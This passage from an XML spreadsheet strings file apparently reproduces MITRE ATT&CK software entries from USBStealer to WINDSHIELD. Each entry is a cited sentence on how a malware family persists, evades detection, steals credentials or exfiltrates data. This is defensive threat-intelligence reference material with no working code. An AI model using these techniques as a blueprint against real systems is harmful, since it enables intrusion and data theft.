    <t>For all non-removable drives on a victim, [USBStealer](https://attack.mitre.org/software/S0136) executes automated collection of certain files for later exfiltration.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) exfiltrates collected files via removable media from air-gapped victims.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) has several commands to delete files associated with the malware from the victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) mimics a legitimate Russian program called USB Disk Security.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Most strings in [USBStealer](https://attack.mitre.org/software/S0136) are encrypted using 3DES and XOR and reversed.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) registers itself under a Registry Run key with the name "USB Disk Security."(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net user&lt;/code&gt; to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;tasklist&lt;/code&gt; to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net view&lt;/code&gt; to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;nbtstat&lt;/code&gt; to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) creates valid local users to provide access to the system.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access to the system via SSH or any other protocol that uses PAM to authenticate.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of stealing usernames and passwords from browsers on the victim machine.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of downloading remote files.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of recording keystrokes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of spreading to USB devices.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim computer name, physical memory, country, and date.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim's IP address.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim usernames.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010).(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) uses a custom packer.(Citation: Symantec Waterbug)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM objects to execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used encoded data in HTTP URLs for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has collected files from victim machines, including certificates and cookies.(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a DGA to generate domain names for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTP POSTs to exfil gathered information.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has deleted data staged in tmp files after exfiltration.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM properties to execute malware in hidden windows.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S0386) has also been used to download and execute additional payloads.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used tmp files to stage gathered information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry modifications as part of its installation routine.(Citation: TrendMicro BKDR_URSNIF.SM)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Tor](https://attack.mitre.org/software/S0183) for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used &lt;code&gt;CreateProcessW&lt;/code&gt; to create child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used an XOR-based algorithm to encrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) droppers have also been delivered as password-protected zip files that execute base64 encoded [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running processes.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used process hollowing to inject into child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a peer-to-peer (P2P) network for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Reg](https://attack.mitre.org/software/S0075) to query the Registry for installed programs.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry Run keys to establish automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected removable drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used hooked APIs to take screenshots.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather system information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected files in network drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected code into target processes via thread local storage callbacks.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro PE_URSNIF.A2)(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a 30 minute delay after execution to evade sandbox monitoring tools.(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used VBA macros to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used WMI classes to execute [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has registered itself as a system service in the Registry for automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to complicate forensic analysis by deleting all the files contained in &lt;code&gt;%APPDATA%\..\Local\Temporary Internet Files\Content.Word&lt;/code&gt; and &lt;code&gt;%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8}&lt;/code&gt; to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) encrypts the collected files using 3-DES.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform audio capture.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects data stored in the clipboard.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) decrypts code, strings, and commands to use once it's on the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can delete files on the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can download and upload files to the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects keystrokes from the victim machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is obfuscated using the obfuscation tool called ConfuserEx.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can get a list of the processes and running tasks on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform screen captures of the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses WMI to check for anti-virus software installed on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is initially packed.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects the OS name, machine name, and architecture information.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the local IP address.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the username from the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including [IcedID](https://attack.mitre.org/software/S0483) and NetSupport Manager RAT-based malware.(Citation: Unit 42 Valak July 2020)(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key &lt;code&gt;HKCU\Software\ApplicationContainer\Appsw64&lt;/code&gt; to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used &lt;code&gt;regsvr32.exe&lt;/code&gt; to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)  </t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version and computer name on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the domain and the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use &lt;code&gt;wmic process call create&lt;/code&gt; in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) can download files.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is capable of tunneling though a proxy.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) copies itself to disk and creates an associated run key Registry entry to establish.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants use SSL to encrypt C2 communications.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) deobfuscates its strings and APIs once its executed.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can delete files and itself after infection to avoid analysis.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can list directories on a victim.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can download remote files and additional payloads to the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) stores the encoded configuration file in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) executes payloads using the Windows API call CreateProcessW().(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>A [Volgmer](https://attack.mitre.org/software/S0180) variant is encoded using a simple XOR cipher.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather a list of processes.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) checks the system for certain Registry keys.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) uses a simple XOR cipher to encrypt traffic and files.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather system information, the computer name, OS version, drive and serial information from the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather the IP address from the victim's machine.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather information about TCP connection state.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) queries the system to identify existing services.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can execute commands on the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some [Volgmer](https://attack.mitre.org/software/S0180) variants also install .dll files as services with names generated by a list of hard-coded strings.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Variants of [WEBC2](https://attack.mitre.org/software/S0109) achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can download and execute a file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can open an interactive command shell.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is capable of file deletion along with other file system interaction.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) C2 traffic can communicate via TCP raw sockets.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather Registry values.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim computer name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
